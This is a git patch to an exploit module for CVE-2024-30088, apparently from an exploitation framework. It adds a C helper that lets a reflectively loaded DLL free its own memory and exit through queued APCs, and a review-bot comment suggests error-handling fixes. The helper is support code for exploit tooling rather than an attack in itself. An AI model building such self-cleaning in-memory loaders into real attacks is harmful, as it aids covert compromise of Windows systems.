From b32234382e019534cf9b87d3c75b7f8e7ec335a8 Mon Sep 17 00:00:00 2001
From: Jack Heysel
Date: Thu, 29 Aug 2024 18:53:39 -0400
Subject: [PATCH] Add correct missing file

---
 .../ReflectiveFreeAndExitThread.c | 50 +++++++++++++++++--
 1 file changed, 45 insertions(+), 5 deletions(-)

diff --git a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
index 8920538961ff..77feb1b94e7b 100644
--- a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
+++ b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
@@ -1,8 +1,48 @@
-#ifndef _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H
-#define _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H
+#include "ReflectiveFreeAndExitThread.h"
 
-#include
+typedef NTSTATUS
+(*NtQueueApcThread)(
+ HANDLE ThreadHandle,
+ PVOID ApcRoutine,
+ ULONG_PTR SystemArgument1,
+ ULONG_PTR SystemArgument2,
+ ULONG_PTR SystemArgument3
+ );
 
-VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode);
+VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode) {
+ NtQueueApcThread pNtQueueApcThread = (NtQueueApcThread)GetProcAddress(GetModuleHandle(TEXT("ntdll")), "NtQueueApcThread");
+ HANDLE hThread = NULL;
+ HANDLE hThisThread = NULL;
 
-#endif
\ No newline at end of file
+ do {
+ if (!pNtQueueApcThread)
+ break;
+
+ // create a suspended thread that will just exit once the APCs have executed
+ hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExitThread, 0, CREATE_SUSPENDED, NULL);
+ if (!hThread)
+ break;
+
+ // open a real handle to this thread to pass in the APC so it operates on this thread and not itself
+ hThisThread = OpenThread(THREAD_QUERY_INFORMATION | SYNCHRONIZE, FALSE, GetCurrentThreadId());
+ if (!hThisThread)
+ break;
+
+ // tell that thread to wait on this thread, ensures VirtualFree isn't called until this thread has exited
+ pNtQueueApcThread(hThread, WaitForSingleObjectEx, (ULONG_PTR)hThisThread, INFINITE, FALSE);
+
+ // then close the handle so it's not leaked
+ QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread);
+
+ // then free the memory
+ pNtQueueApcThread(hThread, VirtualFree, (ULONG_PTR)hAppInstance, 0, MEM_RELEASE);
+
+ ResumeThread(hThread);
+ } while (FALSE);
+
+ if (hThread)
+ CloseHandle(hThread);
+
+ ExitThread(dwExitCode);
+ return;
+}
\ No newline at end of file
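Review bot: The NTSTATUS from the first pNtQueueApcThread call and the BOOL from QueueUserAPC are discarded, so if the wait-on-this-thread APC is never queued, the VirtualFree APC still runs as soon as ResumeThread is called and can release hAppInstance while this thread is still executing from it. Each queue call should be checked before the next one is queued, and any failure after CreateThread should still resume hThread so the suspended thread runs whatever was queued and exits instead of lingering suspended behind a closed handle, which is also what happens today on the `if (!hThisThread) break;` path. NT_SUCCESS is only available if winternl.h or ntdef.h reaches this file through the header; `status < 0` is the equivalent test otherwise. hThisThread is still leaked on the partial-failure path, which seems tolerable for a function that is about to ExitThread.

```c
		// tell that thread to wait on this thread, ensures VirtualFree isn't called until this thread has exited
		NTSTATUS status = pNtQueueApcThread(hThread, WaitForSingleObjectEx, (ULONG_PTR)hThisThread, INFINITE, FALSE);
		if (!NT_SUCCESS(status))
			break;

		// then close the handle so it's not leaked
		if (!QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread))
			break;

		// then free the memory; only safe now that the wait APC is known to be ahead of it
		pNtQueueApcThread(hThread, VirtualFree, (ULONG_PTR)hAppInstance, 0, MEM_RELEASE);
	} while (FALSE);

	// resume on every path so the helper thread drains its queued APCs (or just ExitThread(0)) rather than staying suspended
	if (hThread) {
		ResumeThread(hThread);
		CloseHandle(hThread);
	}
	// … unchanged: ExitThread(dwExitCode) …
```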